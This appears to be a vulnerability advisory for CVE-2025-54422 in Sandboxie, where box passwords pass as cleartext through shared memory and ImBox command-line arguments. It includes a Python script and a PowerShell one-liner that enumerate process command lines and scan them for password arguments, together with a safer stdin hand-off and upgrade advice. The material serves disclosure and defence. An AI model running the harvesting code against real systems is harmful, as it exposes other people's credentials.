PT-2025-31199 · Sandboxie · Sandboxie

Love-Code-Yeyixiao · Published 2025-07-29 · Updated 2025-07-29 · CVE-2025-54422

CVSS v4.0: 6.9 (Medium)
Vector: AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Name of the Vulnerable Software and Affected Versions:

Sandboxie versions 1.16.1 and earlier

Description:

Sandboxie is sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. Versions 1.16.1 and earlier handle the password of an encrypted sandbox insecurely. During encrypted sandbox creation the user's password is transmitted through shared memory, where another process may be able to intercept it. The more serious case is password modification: both the old and the new password are passed as plaintext command-line arguments to the `ImBox` process, with no encryption or obfuscation. Because the command line of a process is readable by any other process running in the same user session (for example through the Win32_Process CommandLine property or NtQueryInformationProcess), an unprivileged process can harvest both passwords without needing any elevated rights.
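The exposure described above, as an added example (this is not Sandboxie or ImBox code): a Python script that enumerates the command lines of every process visible to the current user, flags arguments that look like passwords, and contrasts that with handing a secret to a child process over a stdin pipe. The process list, PIDs, switch names and passwords in the sample snapshot are constructed for the demo; the ImBox switch patterns in the scanner are an assumption, not ImBox's real syntax. The Windows enumeration path uses PowerShell's `Get-CimInstance Win32_Process`, the other path reads `/proc/<pid>/cmdline`.

```python
"""Harvest and detect credential-bearing command lines (added example).

Not Sandboxie project code. Shows (1) how any process in the user session can
enumerate other processes' argv, (2) a heuristic scan for password-like
switches such as the old/new box password the advisory describes, and
(3) handing a secret to a child over a pipe instead of argv.
"""
import json
import os
import re
import subprocess
import sys

# Switch names that commonly carry secrets. ImBox's real switch names are not
# given on the advisory page; these patterns are an assumption for the demo.
SECRET_SWITCH = re.compile(r"^[-/]{1,2}(old|new)?[_-]?(pass(word|wd)?|pw|pwd)$", re.I)
SWITCH_SHAPE = re.compile(r"^([-/]{1,2}\w+)(?:[:=](.*))?$")


def list_processes():
    """Return [(pid, name, argv)] for processes visible to the current user.

    Windows: Win32_Process via PowerShell/CIM; the CommandLine of every process
    running as the same user is readable without elevation. Other OSes:
    /proc/<pid>/cmdline. Either way, argv is public to the session.
    """
    procs = []
    if os.name == "nt":
        ps = ("Get-CimInstance Win32_Process | "
              "Select-Object ProcessId,Name,CommandLine | ConvertTo-Json -Compress")
        out = subprocess.run(["powershell", "-NoProfile", "-Command", ps],
                             capture_output=True, text=True, check=True).stdout
        rows = json.loads(out)
        for p in [rows] if isinstance(rows, dict) else rows:
            # Whitespace split is a crude stand-in for CommandLineToArgvW.
            procs.append((p["ProcessId"], p["Name"], (p.get("CommandLine") or "").split()))
    else:
        for pid in filter(str.isdigit, os.listdir("/proc")):
            try:
                with open(f"/proc/{pid}/cmdline", "rb") as f:
                    argv = [a.decode(errors="replace")
                            for a in f.read().split(b"\0") if a]
            except OSError:
                continue  # process exited or is not readable
            if argv:
                procs.append((int(pid), os.path.basename(argv[0]), argv))
    return procs


def find_credential_args(processes):
    """Return [(pid, name, switch, value)] for argv entries that look like a
    credential, in '--password x', '/pw:x' or '--newpw=x' form."""
    hits = []
    for pid, name, argv in processes:
        for i, arg in enumerate(argv):
            m = SWITCH_SHAPE.match(arg)
            if not m or not SECRET_SWITCH.match(m.group(1)):
                continue
            value = m.group(2)
            if value is None and i + 1 < len(argv):
                value = argv[i + 1]  # '--password <next token>' form
            if value:
                hits.append((pid, name, m.group(1), value))
    return hits


# Constructed sample snapshot, as list_processes() might return it part-way
# through a box password change. PIDs, switch names and passwords are made up.
SAMPLE = [
    (4120, "explorer.exe", ["C:\\Windows\\explorer.exe"]),
    (5208, "ImBox.exe", ["ImBox.exe", "/oldpw:Summer2024!", "/newpw:Winter2025!"]),
    (5333, "notepad.exe", ["notepad.exe", "C:\\notes\\password-policy.txt"]),
    (5400, "tool.exe", ["tool.exe", "--password", "hunter2", "--verbose"]),
]


def run_with_secret_on_stdin(cmd, secret):
    """Safer hand-off: write the secret to the child's stdin pipe. Only the two
    pipe endpoints can read it; nothing lands in argv or process-creation logs."""
    done = subprocess.run(cmd, input=secret + "\n", capture_output=True,
                          text=True, check=True)
    return done.stdout.strip()


def demo_stdin_handoff(secret="hunter2"):
    """Child Python reads the secret from stdin and reports only its length,
    so its command line never contains the secret."""
    child = [sys.executable, "-c",
             "import sys; print(len(sys.stdin.readline().rstrip('\\n')))"]
    return int(run_with_secret_on_stdin(child, secret))


if __name__ == "__main__":
    for pid, name, switch, value in find_credential_args(list_processes()):
        print(f"pid {pid} {name}: {switch} -> {value[:2]}*** ({len(value)} chars)")
```

Run it on a Windows host while a box password change is in progress to confirm the leak; the same harvest is one line of PowerShell, `Get-CimInstance Win32_Process | Select-Object ProcessId,Name,CommandLine`. Two caveats: the heuristic only catches named switches, not a bare positional password, and an argv leak outlives the process wherever process-creation auditing is enabled (Windows event 4688 with command-line logging, Sysmon event 1), so it is prudent to change the box password again after upgrading.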

Recommendations:

Update to Sandboxie version 1.16.2 or later.

Weakness Enumeration

CWE-312: Cleartext Storage of Sensitive Information
CWE-522: Insufficiently Protected Credentials

Related Identifiers

CVE-2025-54422
GHSA-JP7R-VGV9-43P7

Affected Products

Sandboxie